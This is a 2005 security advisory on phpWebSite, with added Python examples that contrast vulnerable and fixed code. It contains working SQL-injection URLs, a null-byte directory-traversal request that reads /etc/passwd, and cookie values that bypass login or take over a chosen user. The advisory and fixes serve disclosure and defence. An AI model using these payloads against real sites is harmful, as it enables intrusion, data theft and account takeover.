phpwebsiteSQL.txt

2005-07-07T00:00:00
ID PACKETSTORM:38513
Type packetstorm
Reporter Diabolic Crab
Modified 2005-07-07T00:00:00

Description

                                        
Dcrab's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

Get Dcrab's services to audit your web servers, scripts, networks, etc. or even code them. Learn more at http://www.dbtech.org
  
Severity: High
Title: Phpwebsite has multiple serious vulnerabilities
Date: 7/07/2005

Vendor: Phpwebsite
Vendor Website: http://phpwebsite.appstate.edu
Vendor Status: Contacted; a patch has been released
Summary: There are multiple SQL injection, authentication bypass and directory traversal vulnerabilities in Phpwebsite. All of them stem from request parameters and cookie values being used unsanitized in SQL queries and file paths.
  
  
Proof of Concept Exploits:

SQL injection via the module parameter:

www.example.com/phpwebsite/index.php?module='&search_op=search&mod=all&query=1&search=Search

The single quote terminates the string literal, and the database error, query included, is printed back to the browser:

DB Error: syntax error
SELECT show_block, block_title FROM mod_search WHERE module=''' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]

SQL injection via the mod parameter:

www.example.com/phpwebsite/index.php?module=search&search_op=search&mod='&query=1&search=Search

DB Error: syntax error
SELECT block_title FROM mod_search WHERE module=''' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]

Directory traversal via the mod parameter:

www.example.com/phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search

The mod value is used to build a file path, and the %00 cuts off whatever the script appends to it, so the server returns the contents of /etc/passwd:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false news:x:9:13:News
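
The traversal above works because the search module turns the mod parameter into a filesystem path, and the encoded NUL (%00) discards whatever suffix the script appends: PHP of that era handed the string to C library calls, which stop at the first NUL byte. The following is an added Python example, not phpWebSite code, that models that lookup next to a hardened replacement. The module directory /var/www/phpwebsite/mod and the /index.php suffix are assumptions made for the illustration; the payload is the advisory's own.

```python
import os
import re
from urllib.parse import unquote

# Payload from the advisory, still URL-encoded as it travels in the query string.
TRAVERSAL_PAYLOAD = "../../../../../../../../etc/passwd%00"

# Assumed layout: each module lives in <base>/<mod>/index.php.
MODULE_BASE = "/var/www/phpwebsite/mod"
MODULE_NAME = re.compile(r"[a-z0-9_]+")


def module_file_vulnerable(base, mod):
    """Models the unsafe lookup: concatenate the name, append the suffix, then
    truncate at the first NUL the way the C-level open() call does.
    That truncation is what lets %00 throw away the '/index.php' suffix."""
    path = os.path.join(base, mod + "/index.php")
    return os.path.normpath(path.split("\x00", 1)[0])


def module_file_safe(base, mod):
    """Hardened lookup: whitelist the name (fullmatch, so a trailing newline or
    NUL cannot slip past), then confirm the resolved path is still inside the
    module directory as defence in depth."""
    if not MODULE_NAME.fullmatch(mod):
        raise ValueError("invalid module name: %r" % mod)
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, mod, "index.php"))
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError("module path escapes %s" % base_real)
    return target


def demo(base=MODULE_BASE, encoded=TRAVERSAL_PAYLOAD):
    """Return (path the vulnerable lookup opens, whether the safe lookup refused)."""
    mod = unquote(encoded)           # '%00' becomes a real NUL byte here
    opened = module_file_vulnerable(base, mod)
    try:
        module_file_safe(base, mod)
        refused = False
    except ValueError:
        refused = True
    return opened, refused


if __name__ == "__main__":
    print("vulnerable lookup opens: %s, safe lookup refused: %s" % demo())
    print("legitimate module resolves to:", module_file_safe(MODULE_BASE, "search"))
```

The whitelist alone would stop the advisory's payload; the realpath/commonpath check is there so that a future relaxation of the pattern (hyphens, dots) cannot quietly reopen the traversal.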
  
Authentication bypass via the remember-me cookie:

Log into a user account with "remember me" checked, then delete all the cookies besides the one named [mod_users][rememberme].
Cookie name: *an md5 hash set by the website* [mod_users][rememberme]
Value: a' or 'a' = 'a
The cookie value is placed unescaped into the SQL query that looks up the remembered login, so the injected condition matches any row. You can also take over a specific user account by setting the cookie value to:
a' or user_id = '5'
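
The search-module errors and the remember-me cookie are the same defect: user-controlled strings are concatenated straight into SQL. The following is an added Python example, not code from the advisory or from phpWebSite, that reproduces both payload shapes against an in-memory SQLite database and shows the parameterised queries that close them. The mod_search columns come from the error messages quoted above; the mod_users table, its remember_me column and the sample rows are constructed assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for a phpWebSite install (assumed schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE mod_search (module TEXT, show_block INTEGER, block_title TEXT);
        INSERT INTO mod_search VALUES ('search', 1, 'Search');
        CREATE TABLE mod_users (user_id INTEGER, username TEXT, remember_me TEXT);
        INSERT INTO mod_users VALUES (1, 'alice', 'd41d8cd98f00b204e9800998ecf8427e');
        INSERT INTO mod_users VALUES (5, 'admin', '9e107d9d372bb6826bd81d3542a419d6');
    """)
    return con


def search_block_vulnerable(con, module):
    """String-built query with the shape shown in the advisory's DB error."""
    sql = "SELECT show_block, block_title FROM mod_search WHERE module='%s'" % module
    return con.execute(sql).fetchall()


def search_block_safe(con, module):
    """Same lookup with a bound parameter: the value can never become SQL."""
    return con.execute(
        "SELECT show_block, block_title FROM mod_search WHERE module=?", (module,)
    ).fetchall()


def rememberme_login_vulnerable(con, cookie):
    """Assumed shape of the remember-me lookup; returns the usernames matched."""
    sql = "SELECT username FROM mod_users WHERE remember_me='%s'" % cookie
    return sorted(r[0] for r in con.execute(sql).fetchall())


def rememberme_login_safe(con, cookie):
    """Parameterised remember-me lookup."""
    return sorted(r[0] for r in con.execute(
        "SELECT username FROM mod_users WHERE remember_me=?", (cookie,)).fetchall())


def demo():
    """Run the advisory's payloads through both variants and collect the outcomes."""
    con = make_db()
    out = {}
    # module=' leaves an unbalanced quote: MySQL reports error 1064 as quoted in
    # the advisory, SQLite raises OperationalError for the same reason.
    try:
        search_block_vulnerable(con, "'")
        out["quote_breaks_query"] = False
    except sqlite3.OperationalError:
        out["quote_breaks_query"] = True
    out["quote_safe_rows"] = search_block_safe(con, "'")      # simply no match
    out["legit_rows"] = search_block_safe(con, "search")
    # Cookie payloads from the advisory: match every user, or exactly user_id 5.
    out["cookie_any"] = rememberme_login_vulnerable(con, "a' or 'a' = 'a")
    out["cookie_uid5"] = rememberme_login_vulnerable(con, "a' or user_id = '5")
    out["cookie_safe"] = rememberme_login_safe(con, "a' or 'a' = 'a")
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The remember-me case is the one to take away: a login check that accepts any row returned is only as strong as the escaping on the token, so the token must be bound as a parameter and, ideally, compared against a single user selected by a separate identifier.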
  
Solution:
The vendors were contacted via email and responded quickly. The details were sent to them, after which a patch was released on their official website.

You can get the security patch at:
http://phpwebsite.appstate.edu/downloads/security/phpwebsite_security_patch_20050705.2.tgz

Keep yourself updated; RSS feed at http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com

Author:
These vulnerabilities were found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://www.dbtech.org/. Look out for my forthcoming book on secure coding with PHP.
  
  
--------------------------------------------------------------------------------

Sincerely,
Diabolic Crab
  
  
  
  
  